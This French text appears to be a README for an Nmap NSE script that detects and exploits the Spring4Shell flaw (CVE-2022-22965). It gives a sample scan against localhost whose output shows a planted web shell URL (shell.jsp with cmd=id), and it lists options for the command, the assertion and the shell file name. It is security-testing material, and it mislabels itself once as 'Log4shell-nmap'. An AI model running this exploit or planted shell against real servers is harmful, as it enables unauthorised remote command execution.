
Script NSE Nmap pour détecter et exploiter la vulnérabilité RCE Spring4Shell (CVE-2022-22965) dans les services HTTP avec injection de charge utile configurable et exécution de commandes.
Log4shell-nmap est un script NSE pour détecter les vulnérabilités RCE Spring4Shell (CVE-2022-22965) dans les services HTTP. Le script injecte la charge utile correcte dans l'application et exécute ensuite la commande suivante sur le point de terminaison spécifié.
Voir ici.
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
Nous pouvons utiliser plusieurs variables dans le script. Voici la liste :
endpoint - URL relative. Sur https://bugspace.pl/search/videos ce sera /search/videos,command - commande à exécuter sur le serveur. La commande par défaut est id,assertion - chaîne vérifiée dans la réponse du serveur. L'assertion par défaut est uid,filename - nom du fichier sur le serveur. Pour plus d'informations, voir ici. Le nom par défaut est shell.Testé sur l'application provenant de ici et de ici
Identique à Nmap. Voir https://nmap.org/book/man-legal.html